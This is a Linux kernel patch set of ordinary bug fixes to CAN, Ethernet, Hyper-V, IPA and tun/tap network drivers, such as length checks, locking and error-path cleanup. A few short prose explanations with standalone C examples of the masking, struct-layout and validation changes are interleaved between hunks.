+-#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	0
++#define SPINOR_REG_CYPRESS_CFR5_BIT6		BIT(6)
++#define SPINOR_REG_CYPRESS_CFR5_DDR		BIT(1)
++#define SPINOR_REG_CYPRESS_CFR5_OPI		BIT(0)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_EN				\
++	(SPINOR_REG_CYPRESS_CFR5_BIT6 |	SPINOR_REG_CYPRESS_CFR5_DDR |	\
++	 SPINOR_REG_CYPRESS_CFR5_OPI)
++#define SPINOR_REG_CYPRESS_CFR5V_OCT_DTR_DS	SPINOR_REG_CYPRESS_CFR5_BIT6
+ #define SPINOR_OP_CYPRESS_RD_FAST		0xee
+ 
+ /* Cypress SPI NOR flash operations. */
+diff --git a/drivers/net/can/rcar/rcar_canfd.c b/drivers/net/can/rcar/rcar_canfd.c
+index f6fa7157b99b0..77b21c82faf38 100644
+--- a/drivers/net/can/rcar/rcar_canfd.c
++++ b/drivers/net/can/rcar/rcar_canfd.c
+@@ -92,10 +92,10 @@
+ /* RSCFDnCFDGAFLCFG0 / RSCFDnGAFLCFG0 */
+ #define RCANFD_GAFLCFG_SETRNC(gpriv, n, x) \
+ 	(((x) & reg_v3u(gpriv, 0x1ff, 0xff)) << \
+-	 (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8)))
++	 (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8)))
+ 
+ #define RCANFD_GAFLCFG_GETRNC(gpriv, n, x) \
+-	(((x) >> (reg_v3u(gpriv, 16, 24) - (n) * reg_v3u(gpriv, 16, 8))) & \
++	(((x) >> (reg_v3u(gpriv, 16, 24) - ((n) & 1) * reg_v3u(gpriv, 16, 8))) & \
+ 	 reg_v3u(gpriv, 0x1ff, 0xff))
+ 
+ /* RSCFDnCFDGAFLECTR / RSCFDnGAFLECTR */
+@@ -197,8 +197,8 @@
+ #define RCANFD_DCFG_DBRP(x)		(((x) & 0xff) << 0)
+ 
+ /* RSCFDnCFDCmFDCFG */
+-#define RCANFD_FDCFG_CLOE		BIT(30)
+-#define RCANFD_FDCFG_FDOE		BIT(28)
++#define RCANFD_V3U_FDCFG_CLOE		BIT(30)
++#define RCANFD_V3U_FDCFG_FDOE		BIT(28)
+ #define RCANFD_FDCFG_TDCE		BIT(9)
+ #define RCANFD_FDCFG_TDCOC		BIT(8)
+ #define RCANFD_FDCFG_TDCO(x)		(((x) & 0x7f) >> 16)
+@@ -429,8 +429,8 @@
+ #define RCANFD_C_RPGACC(r)		(0x1900 + (0x04 * (r)))
+ 
+ /* R-Car V3U Classical and CAN FD mode specific register map */
+-#define RCANFD_V3U_CFDCFG		(0x1314)
+ #define RCANFD_V3U_DCFG(m)		(0x1400 + (0x20 * (m)))
++#define RCANFD_V3U_FDCFG(m)		(0x1404 + (0x20 * (m)))
+ 
+ #define RCANFD_V3U_GAFL_OFFSET		(0x1800)
+ 
+@@ -689,12 +689,13 @@ static void rcar_canfd_tx_failure_cleanup(struct net_device *ndev)
+ static void rcar_canfd_set_mode(struct rcar_canfd_global *gpriv)
+ {
+ 	if (is_v3u(gpriv)) {
+-		if (gpriv->fdmode)
+-			rcar_canfd_set_bit(gpriv->base, RCANFD_V3U_CFDCFG,
+-					   RCANFD_FDCFG_FDOE);
+-		else
+-			rcar_canfd_set_bit(gpriv->base, RCANFD_V3U_CFDCFG,
+-					   RCANFD_FDCFG_CLOE);
++		u32 ch, val = gpriv->fdmode ? RCANFD_V3U_FDCFG_FDOE
++					    : RCANFD_V3U_FDCFG_CLOE;
++
++		for_each_set_bit(ch, &gpriv->channels_mask,
++				 gpriv->info->max_channels)
++			rcar_canfd_set_bit(gpriv->base, RCANFD_V3U_FDCFG(ch),
++					   val);
+ 	} else {
+ 		if (gpriv->fdmode)
+ 			rcar_canfd_set_bit(gpriv->base, RCANFD_GRMCFG,
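The added (n) & 1 masking in the RNC macros reflects that the fields are packed two channels per 32-bit register, so only the low bit of the channel number selects the field position; without the mask, channel numbers of 2 and up would compute shifts outside the register. A sketch using the non-V3U layout (8-bit fields at bits 31:24 and 23:16; names illustrative, not the driver's API):

#include <inttypes.h>
#include <stdio.h>

/* Two 8-bit per-channel fields share each 32-bit register, so the
 * field position depends only on whether the channel number is even
 * or odd; (n & 1) keeps higher channel numbers in range. */
static uint32_t setrnc(unsigned int n, uint32_t x)
{
	return (x & 0xff) << (24 - (n & 1) * 8);
}

int main(void)
{
	/* channels 0 and 2 land in the same slot of their respective
	 * registers (bits 31:24); channels 1 and 3 in bits 23:16 */
	printf("ch0: 0x%08" PRIx32 "\n", setrnc(0, 0x12));
	printf("ch1: 0x%08" PRIx32 "\n", setrnc(1, 0x34));
	printf("ch2: 0x%08" PRIx32 "\n", setrnc(2, 0x56));
	return 0;
}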
+diff --git a/drivers/net/can/usb/esd_usb.c b/drivers/net/can/usb/esd_usb.c
+index 42323f5e6f3a0..578b25f873e58 100644
+--- a/drivers/net/can/usb/esd_usb.c
++++ b/drivers/net/can/usb/esd_usb.c
+@@ -239,41 +239,42 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			   msg->msg.rx.dlc, state, ecc, rxerr, txerr);
+ 
+ 		skb = alloc_can_err_skb(priv->netdev, &cf);
+-		if (skb == NULL) {
+-			stats->rx_dropped++;
+-			return;
+-		}
+ 
+ 		if (state != priv->old_state) {
++			enum can_state tx_state, rx_state;
++			enum can_state new_state = CAN_STATE_ERROR_ACTIVE;
++
+ 			priv->old_state = state;
+ 
+ 			switch (state & ESD_BUSSTATE_MASK) {
+ 			case ESD_BUSSTATE_BUSOFF:
+-				priv->can.state = CAN_STATE_BUS_OFF;
+-				cf->can_id |= CAN_ERR_BUSOFF;
+-				priv->can.can_stats.bus_off++;
++				new_state = CAN_STATE_BUS_OFF;
+ 				can_bus_off(priv->netdev);
+ 				break;
+ 			case ESD_BUSSTATE_WARN:
+-				priv->can.state = CAN_STATE_ERROR_WARNING;
+-				priv->can.can_stats.error_warning++;
++				new_state = CAN_STATE_ERROR_WARNING;
+ 				break;
+ 			case ESD_BUSSTATE_ERRPASSIVE:
+-				priv->can.state = CAN_STATE_ERROR_PASSIVE;
+-				priv->can.can_stats.error_passive++;
++				new_state = CAN_STATE_ERROR_PASSIVE;
+ 				break;
+ 			default:
+-				priv->can.state = CAN_STATE_ERROR_ACTIVE;
++				new_state = CAN_STATE_ERROR_ACTIVE;
+ 				txerr = 0;
+ 				rxerr = 0;
+ 				break;
+ 			}
+-		} else {
++
++			if (new_state != priv->can.state) {
++				tx_state = (txerr >= rxerr) ? new_state : 0;
++				rx_state = (txerr <= rxerr) ? new_state : 0;
++				can_change_state(priv->netdev, cf,
++						 tx_state, rx_state);
++			}
++		} else if (skb) {
+ 			priv->can.can_stats.bus_error++;
+ 			stats->rx_errors++;
+ 
+-			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR |
+-				      CAN_ERR_CNT;
++			cf->can_id |= CAN_ERR_PROT | CAN_ERR_BUSERROR;
+ 
+ 			switch (ecc & SJA1000_ECC_MASK) {
+ 			case SJA1000_ECC_BIT:
+@@ -286,7 +287,6 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 				cf->data[2] |= CAN_ERR_PROT_STUFF;
+ 				break;
+ 			default:
+-				cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 				break;
+ 			}
+ 
+@@ -294,20 +294,22 @@ static void esd_usb_rx_event(struct esd_usb_net_priv *priv,
+ 			if (!(ecc & SJA1000_ECC_DIR))
+ 				cf->data[2] |= CAN_ERR_PROT_TX;
+ 
+-			if (priv->can.state == CAN_STATE_ERROR_WARNING ||
+-			    priv->can.state == CAN_STATE_ERROR_PASSIVE) {
+-				cf->data[1] = (txerr > rxerr) ?
+-					CAN_ERR_CRTL_TX_PASSIVE :
+-					CAN_ERR_CRTL_RX_PASSIVE;
+-			}
+-			cf->data[6] = txerr;
+-			cf->data[7] = rxerr;
++			/* Bit stream position in CAN frame when the error was detected */
++			cf->data[3] = ecc & SJA1000_ECC_SEG;
+ 		}
+ 
+ 		priv->bec.txerr = txerr;
+ 		priv->bec.rxerr = rxerr;
+ 
+-		netif_rx(skb);
++		if (skb) {
++			cf->can_id |= CAN_ERR_CNT;
++			cf->data[6] = txerr;
++			cf->data[7] = rxerr;
++
++			netif_rx(skb);
++		} else {
++			stats->rx_dropped++;
++		}
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index 21973046b12b4..d937daa8ee883 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2316,6 +2316,14 @@ static unsigned int bcmgenet_desc_rx(struct bcmgenet_rx_ring *ring,
+ 			  __func__, p_index, ring->c_index,
+ 			  ring->read_ptr, dma_length_status);
+ 
++		if (unlikely(len > RX_BUF_LENGTH)) {
++			netif_err(priv, rx_status, dev, "oversized packet\n");
++			dev->stats.rx_length_errors++;
++			dev->stats.rx_errors++;
++			dev_kfree_skb_any(skb);
++			goto next;
++		}
++
+ 		if (unlikely(!(dma_flag & DMA_EOP) || !(dma_flag & DMA_SOP))) {
+ 			netif_err(priv, rx_status, dev,
+ 				  "dropping fragmented packet!\n");
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmmii.c b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+index b615176338b26..be042905ada2a 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmmii.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmmii.c
+@@ -176,15 +176,6 @@ void bcmgenet_phy_power_set(struct net_device *dev, bool enable)
+ 
+ static void bcmgenet_moca_phy_setup(struct bcmgenet_priv *priv)
+ {
+-	u32 reg;
+-
+-	if (!GENET_IS_V5(priv)) {
+-		/* Speed settings are set in bcmgenet_mii_setup() */
+-		reg = bcmgenet_sys_readl(priv, SYS_PORT_CTRL);
+-		reg |= LED_ACT_SOURCE_MAC;
+-		bcmgenet_sys_writel(priv, reg, SYS_PORT_CTRL);
+-	}
+-
+ 	if (priv->hw_params->flags & GENET_HAS_MOCA_LINK_DET)
+ 		fixed_phy_set_link_update(priv->dev->phydev,
+ 					  bcmgenet_fixed_phy_link_update);
+@@ -217,6 +208,8 @@ int bcmgenet_mii_config(struct net_device *dev, bool init)
+ 
+ 		if (!phy_name) {
+ 			phy_name = "MoCA";
++			if (!GENET_IS_V5(priv))
++				port_ctrl |= LED_ACT_SOURCE_MAC;
+ 			bcmgenet_moca_phy_setup(priv);
+ 		}
+ 		break;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 8ec24f6cf6beb..3811462824390 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -6182,15 +6182,12 @@ int ice_vsi_cfg(struct ice_vsi *vsi)
+ {
+ 	int err;
+ 
+-	if (vsi->netdev) {
++	if (vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_set_rx_mode(vsi->netdev);
+ 
+-		if (vsi->type != ICE_VSI_LB) {
+-			err = ice_vsi_vlan_setup(vsi);
+-
+-			if (err)
+-				return err;
+-		}
++		err = ice_vsi_vlan_setup(vsi);
++		if (err)
++			return err;
+ 	}
+ 	ice_vsi_cfg_dcb_rings(vsi);
+ 
+@@ -6371,7 +6368,7 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 
+ 	if (vsi->port_info &&
+ 	    (vsi->port_info->phy.link_info.link_info & ICE_AQ_LINK_UP) &&
+-	    vsi->netdev) {
++	    vsi->netdev && vsi->type == ICE_VSI_PF) {
+ 		ice_print_link_msg(vsi, true);
+ 		netif_tx_start_all_queues(vsi->netdev);
+ 		netif_carrier_on(vsi->netdev);
+@@ -6382,7 +6379,9 @@ static int ice_up_complete(struct ice_vsi *vsi)
+ 	 * set the baseline so counters are ready when interface is up
+ 	 */
+ 	ice_update_eth_stats(vsi);
+-	ice_service_task_schedule(pf);
++
++	if (vsi->type == ICE_VSI_PF)
++		ice_service_task_schedule(pf);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index d63161d73eb16..3abc8db1d0659 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -2269,7 +2269,7 @@ static void ice_ptp_set_caps(struct ice_pf *pf)
+ 	snprintf(info->name, sizeof(info->name) - 1, "%s-%s-clk",
+ 		 dev_driver_string(dev), dev_name(dev));
+ 	info->owner = THIS_MODULE;
+-	info->max_adj = 999999999;
++	info->max_adj = 100000000;
+ 	info->adjtime = ice_ptp_adjtime;
+ 	info->adjfine = ice_ptp_adjfine;
+ 	info->gettimex64 = ice_ptp_gettimex64;
+diff --git a/drivers/net/ethernet/mellanox/mlx4/en_tx.c b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+index c5758637b7bed..2f79378fbf6ec 100644
+--- a/drivers/net/ethernet/mellanox/mlx4/en_tx.c
++++ b/drivers/net/ethernet/mellanox/mlx4/en_tx.c
+@@ -699,32 +699,32 @@ static void build_inline_wqe(struct mlx4_en_tx_desc *tx_desc,
+ 			inl->byte_count = cpu_to_be32(1 << 31 | skb->len);
+ 		} else {
+ 			inl->byte_count = cpu_to_be32(1 << 31 | MIN_PKT_LEN);
+-			memset(((void *)(inl + 1)) + skb->len, 0,
++			memset(inl->data + skb->len, 0,
+ 			       MIN_PKT_LEN - skb->len);
+ 		}
+-		skb_copy_from_linear_data(skb, inl + 1, hlen);
++		skb_copy_from_linear_data(skb, inl->data, hlen);
+ 		if (shinfo->nr_frags)
+-			memcpy(((void *)(inl + 1)) + hlen, fragptr,
++			memcpy(inl->data + hlen, fragptr,
+ 			       skb_frag_size(&shinfo->frags[0]));
+ 
+ 	} else {
+ 		inl->byte_count = cpu_to_be32(1 << 31 | spc);
+ 		if (hlen <= spc) {
+-			skb_copy_from_linear_data(skb, inl + 1, hlen);
++			skb_copy_from_linear_data(skb, inl->data, hlen);
+ 			if (hlen < spc) {
+-				memcpy(((void *)(inl + 1)) + hlen,
++				memcpy(inl->data + hlen,
+ 				       fragptr, spc - hlen);
+ 				fragptr +=  spc - hlen;
+ 			}
+-			inl = (void *) (inl + 1) + spc;
+-			memcpy(((void *)(inl + 1)), fragptr, skb->len - spc);
++			inl = (void *)inl->data + spc;
++			memcpy(inl->data, fragptr, skb->len - spc);
+ 		} else {
+-			skb_copy_from_linear_data(skb, inl + 1, spc);
+-			inl = (void *) (inl + 1) + spc;
+-			skb_copy_from_linear_data_offset(skb, spc, inl + 1,
++			skb_copy_from_linear_data(skb, inl->data, spc);
++			inl = (void *)inl->data + spc;
++			skb_copy_from_linear_data_offset(skb, spc, inl->data,
+ 							 hlen - spc);
+ 			if (shinfo->nr_frags)
+-				memcpy(((void *)(inl + 1)) + hlen - spc,
++				memcpy(inl->data + hlen - spc,
+ 				       fragptr,
+ 				       skb_frag_size(&shinfo->frags[0]));
+ 		}
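The mlx4 hunk above replaces (void *)(inl + 1) arithmetic with inl->data: with a flexible array member, the payload that follows the header gets a name, while the computed address stays identical. A minimal standalone sketch of the equivalence (struct names hypothetical):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* A header immediately followed by inline payload. hdr->data names
 * the payload directly, instead of the equivalent but easier-to-misread
 * (void *)(hdr + 1). */
struct inline_hdr {
	uint32_t byte_count;
	uint8_t data[];
};

int main(void)
{
	struct inline_hdr *hdr = malloc(sizeof(*hdr) + 16);

	if (!hdr)
		return 1;
	hdr->byte_count = 16;
	memcpy(hdr->data, "payload", 8);	/* same address ...   */
	printf("%s\n", (char *)(hdr + 1));	/* ... as hdr + 1     */
	free(hdr);
	return 0;
}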
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+index 5b05b884b5fb3..d7b2ee5de1158 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/diag/fw_tracer.c
+@@ -603,7 +603,7 @@ static int mlx5_tracer_handle_string_trace(struct mlx5_fw_tracer *tracer,
+ 	} else {
+ 		cur_string = mlx5_tracer_message_get(tracer, tracer_event);
+ 		if (!cur_string) {
+-			pr_debug("%s Got string event for unknown string tdsm: %d\n",
++			pr_debug("%s Got string event for unknown string tmsn: %d\n",
+ 				 __func__, tracer_event->string_event.tmsn);
+ 			return -1;
+ 		}
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+index 8bed9c3610754..d739d77d68986 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec.h
+@@ -119,7 +119,7 @@ struct mlx5e_ipsec_work {
+ };
+ 
+ struct mlx5e_ipsec_aso {
+-	u8 ctx[MLX5_ST_SZ_BYTES(ipsec_aso)];
++	u8 __aligned(64) ctx[MLX5_ST_SZ_BYTES(ipsec_aso)];
+ 	dma_addr_t dma_addr;
+ 	struct mlx5_aso *aso;
+ 	/* Protect ASO WQ access, as it is global to whole IPsec */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 0eb50be175cc4..64d4e7125e9bb 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -219,7 +219,8 @@ static int alloc_4k(struct mlx5_core_dev *dev, u64 *addr, u32 function)
+ 
+ 	n = find_first_bit(&fp->bitmask, 8 * sizeof(fp->bitmask));
+ 	if (n >= MLX5_NUM_4K_IN_PAGE) {
+-		mlx5_core_warn(dev, "alloc 4k bug\n");
++		mlx5_core_warn(dev, "alloc 4k bug: fw page = 0x%llx, n = %u, bitmask: %lu, max num of 4K pages: %d\n",
++			       fp->addr, n, fp->bitmask,  MLX5_NUM_4K_IN_PAGE);
+ 		return -ENOENT;
+ 	}
+ 	clear_bit(n, &fp->bitmask);
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+index a8348437dd87f..61fbabf5bebc3 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_ptp.c
+@@ -524,9 +524,9 @@ irqreturn_t lan966x_ptp_irq_handler(int irq, void *args)
+ 		if (WARN_ON(!skb_match))
+ 			continue;
+ 
+-		spin_lock(&lan966x->ptp_ts_id_lock);
++		spin_lock_irqsave(&lan966x->ptp_ts_id_lock, flags);
+ 		lan966x->ptp_skbs--;
+-		spin_unlock(&lan966x->ptp_ts_id_lock);
++		spin_unlock_irqrestore(&lan966x->ptp_ts_id_lock, flags);
+ 
+ 		/* Get the h/w timestamp */
+ 		lan966x_get_hwtimestamp(lan966x, &ts, delay);
+diff --git a/drivers/net/ethernet/qlogic/qede/qede_main.c b/drivers/net/ethernet/qlogic/qede/qede_main.c
+index 953f304b8588c..89d64a5a4951a 100644
+--- a/drivers/net/ethernet/qlogic/qede/qede_main.c
++++ b/drivers/net/ethernet/qlogic/qede/qede_main.c
+@@ -960,7 +960,6 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ {
+ 	u8 fp_combined, fp_rx = edev->fp_num_rx;
+ 	struct qede_fastpath *fp;
+-	void *mem;
+ 	int i;
+ 
+ 	edev->fp_array = kcalloc(QEDE_QUEUE_CNT(edev),
+@@ -970,14 +969,15 @@ static int qede_alloc_fp_array(struct qede_dev *edev)
+ 		goto err;
+ 	}
+ 
+-	mem = krealloc(edev->coal_entry, QEDE_QUEUE_CNT(edev) *
+-		       sizeof(*edev->coal_entry), GFP_KERNEL);
+-	if (!mem) {
+-		DP_ERR(edev, "coalesce entry allocation failed\n");
+-		kfree(edev->coal_entry);
+-		goto err;
++	if (!edev->coal_entry) {
++		edev->coal_entry = kcalloc(QEDE_MAX_RSS_CNT(edev),
++					   sizeof(*edev->coal_entry),
++					   GFP_KERNEL);
++		if (!edev->coal_entry) {
++			DP_ERR(edev, "coalesce entry allocation failed\n");
++			goto err;
++		}
+ 	}
+-	edev->coal_entry = mem;
+ 
+ 	fp_combined = QEDE_QUEUE_CNT(edev) - fp_rx - edev->fp_num_tx;
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpsw-nuss.c b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+index 6cda4b7c10cb6..3e17152798554 100644
+--- a/drivers/net/ethernet/ti/am65-cpsw-nuss.c
++++ b/drivers/net/ethernet/ti/am65-cpsw-nuss.c
+@@ -2852,6 +2852,7 @@ static int am65_cpsw_nuss_probe(struct platform_device *pdev)
+ 
+ err_free_phylink:
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ err_of_clear:
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ err_pm_clear:
+@@ -2880,6 +2881,7 @@ static int am65_cpsw_nuss_remove(struct platform_device *pdev)
+ 	 */
+ 	am65_cpsw_nuss_cleanup_ndev(common);
+ 	am65_cpsw_nuss_phylink_cleanup(common);
++	am65_cpts_release(common->cpts);
+ 
+ 	of_platform_device_destroy(common->mdio_dev, NULL);
+ 
+diff --git a/drivers/net/ethernet/ti/am65-cpts.c b/drivers/net/ethernet/ti/am65-cpts.c
+index 9535396b28cd9..a297890152d92 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.c
++++ b/drivers/net/ethernet/ti/am65-cpts.c
+@@ -929,14 +929,13 @@ static int am65_cpts_of_parse(struct am65_cpts *cpts, struct device_node *node)
+ 	return cpts_of_mux_clk_setup(cpts, node);
+ }
+ 
+-static void am65_cpts_release(void *data)
++void am65_cpts_release(struct am65_cpts *cpts)
+ {
+-	struct am65_cpts *cpts = data;
+-
+ 	ptp_clock_unregister(cpts->ptp_clock);
+ 	am65_cpts_disable(cpts);
+ 	clk_disable_unprepare(cpts->refclk);
+ }
++EXPORT_SYMBOL_GPL(am65_cpts_release);
+ 
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node)
+@@ -1014,18 +1013,12 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 	}
+ 	cpts->phc_index = ptp_clock_index(cpts->ptp_clock);
+ 
+-	ret = devm_add_action_or_reset(dev, am65_cpts_release, cpts);
+-	if (ret) {
+-		dev_err(dev, "failed to add ptpclk reset action %d", ret);
+-		return ERR_PTR(ret);
+-	}
+-
+ 	ret = devm_request_threaded_irq(dev, cpts->irq, NULL,
+ 					am65_cpts_interrupt,
+ 					IRQF_ONESHOT, dev_name(dev), cpts);
+ 	if (ret < 0) {
+ 		dev_err(cpts->dev, "error attaching irq %d\n", ret);
+-		return ERR_PTR(ret);
++		goto reset_ptpclk;
+ 	}
+ 
+ 	dev_info(dev, "CPTS ver 0x%08x, freq:%u, add_val:%u\n",
+@@ -1034,6 +1027,8 @@ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 
+ 	return cpts;
+ 
++reset_ptpclk:
++	am65_cpts_release(cpts);
+ refclk_disable:
+ 	clk_disable_unprepare(cpts->refclk);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/ethernet/ti/am65-cpts.h b/drivers/net/ethernet/ti/am65-cpts.h
+index bd08f4b2edd2d..6e14df0be1137 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.h
++++ b/drivers/net/ethernet/ti/am65-cpts.h
+@@ -18,6 +18,7 @@ struct am65_cpts_estf_cfg {
+ };
+ 
+ #if IS_ENABLED(CONFIG_TI_K3_AM65_CPTS)
++void am65_cpts_release(struct am65_cpts *cpts);
+ struct am65_cpts *am65_cpts_create(struct device *dev, void __iomem *regs,
+ 				   struct device_node *node);
+ int am65_cpts_phc_index(struct am65_cpts *cpts);
+@@ -31,6 +32,10 @@ void am65_cpts_estf_disable(struct am65_cpts *cpts, int idx);
+ void am65_cpts_suspend(struct am65_cpts *cpts);
+ void am65_cpts_resume(struct am65_cpts *cpts);
+ #else
++static inline void am65_cpts_release(struct am65_cpts *cpts)
++{
++}
++
+ static inline struct am65_cpts *am65_cpts_create(struct device *dev,
+ 						 void __iomem *regs,
+ 						 struct device_node *node)
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index 79f4e13620a46..da737d959e81c 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -851,6 +851,7 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 	u32 msglen = hv_pkt_datalen(desc);
+ 	struct nvsp_message *pkt_rqst;
+ 	u64 cmd_rqst;
++	u32 status;
+ 
+ 	/* First check if this is a VMBUS completion without data payload */
+ 	if (!msglen) {
+@@ -922,6 +923,23 @@ static void netvsc_send_completion(struct net_device *ndev,
+ 		break;
+ 
+ 	case NVSP_MSG1_TYPE_SEND_RNDIS_PKT_COMPLETE:
++		if (msglen < sizeof(struct nvsp_message_header) +
++		    sizeof(struct nvsp_1_message_send_rndis_packet_complete)) {
++			if (net_ratelimit())
++				netdev_err(ndev, "nvsp_rndis_pkt_complete length too small: %u\n",
++					   msglen);
++			return;
++		}
++
++		/* If status indicates an error, output a message so we know
++		 * there's a problem. But process the completion anyway so the
++		 * resources are released.
++		 */
++		status = nvsp_packet->msg.v1_msg.send_rndis_pkt_complete.status;
++		if (status != NVSP_STAT_SUCCESS && net_ratelimit())
++			netdev_err(ndev, "nvsp_rndis_pkt_complete error status: %x\n",
++				   status);
++
+ 		netvsc_send_tx_complete(ndev, net_device, incoming_channel,
+ 					desc, budget);
+ 		break;
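The netvsc change first checks that the message is long enough to contain the completion body before reading its status field, instead of trusting msglen. The same validate-then-parse shape in a standalone sketch (the struct layouts are illustrative, not the real NVSP wire format):

#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct msg_hdr {
	uint32_t type;
};

struct rndis_complete {
	uint32_t status;
};

/* Reject the buffer unless it can hold both the header and the
 * completion body; only then dereference the payload. */
static int parse_completion(const uint8_t *buf, size_t len, uint32_t *status)
{
	if (len < sizeof(struct msg_hdr) + sizeof(struct rndis_complete))
		return -1;
	memcpy(status, buf + sizeof(struct msg_hdr), sizeof(*status));
	return 0;
}

int main(void)
{
	uint8_t buf[8] = { 0 };
	uint32_t status;

	printf("%d\n", parse_completion(buf, sizeof(buf), &status)); /* 0 */
	printf("%d\n", parse_completion(buf, 4, &status));	/* -1: short */
	return 0;
}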
+diff --git a/drivers/net/ipa/gsi.c b/drivers/net/ipa/gsi.c
+index bea2da1c4c51d..f1a3938294866 100644
+--- a/drivers/net/ipa/gsi.c
++++ b/drivers/net/ipa/gsi.c
+@@ -1666,7 +1666,8 @@ static int gsi_generic_command(struct gsi *gsi, u32 channel_id,
+ 	val = u32_encode_bits(opcode, GENERIC_OPCODE_FMASK);
+ 	val |= u32_encode_bits(channel_id, GENERIC_CHID_FMASK);
+ 	val |= u32_encode_bits(GSI_EE_MODEM, GENERIC_EE_FMASK);
+-	val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
++	if (gsi->version >= IPA_VERSION_4_11)
++		val |= u32_encode_bits(params, GENERIC_PARAMS_FMASK);
+ 
+ 	timeout = !gsi_command(gsi, GSI_GENERIC_CMD_OFFSET, val);
+ 
+diff --git a/drivers/net/ipa/gsi_reg.h b/drivers/net/ipa/gsi_reg.h
+index 3763359f208f7..e65f2f055cfff 100644
+--- a/drivers/net/ipa/gsi_reg.h
++++ b/drivers/net/ipa/gsi_reg.h
+@@ -372,7 +372,6 @@ enum gsi_general_id {
+ #define GSI_ERROR_LOG_OFFSET \
+ 			(0x0001f200 + 0x4000 * GSI_EE_AP)
+ 
+-/* Fields below are present for IPA v3.5.1 and above */
+ #define ERR_ARG3_FMASK			GENMASK(3, 0)
+ #define ERR_ARG2_FMASK			GENMASK(7, 4)
+ #define ERR_ARG1_FMASK			GENMASK(11, 8)
+diff --git a/drivers/net/tap.c b/drivers/net/tap.c
+index a2be1994b3894..8941aa199ea33 100644
+--- a/drivers/net/tap.c
++++ b/drivers/net/tap.c
+@@ -533,7 +533,7 @@ static int tap_open(struct inode *inode, struct file *file)
+ 	q->sock.state = SS_CONNECTED;
+ 	q->sock.file = file;
+ 	q->sock.ops = &tap_socket_ops;
+-	sock_init_data(&q->sock, &q->sk);
++	sock_init_data_uid(&q->sock, &q->sk, inode->i_uid);
+ 	q->sk.sk_write_space = tap_sock_write_space;
+ 	q->sk.sk_destruct = tap_sock_destruct;
+ 	q->flags = IFF_VNET_HDR | IFF_NO_PI | IFF_TAP;
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index a7d17c680f4a0..745131b2d6dbf 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -3448,7 +3448,7 @@ static int tun_chr_open(struct inode *inode, struct file * file)
+ 	tfile->socket.file = file;
+ 	tfile->socket.ops = &tun_socket_ops;
+ 
+-	sock_init_data(&tfile->socket, &tfile->sk);
++	sock_init_data_uid(&tfile->socket, &tfile->sk, inode->i_uid);
+ 
+ 	tfile->sk.sk_write_space = tun_sock_write_space;
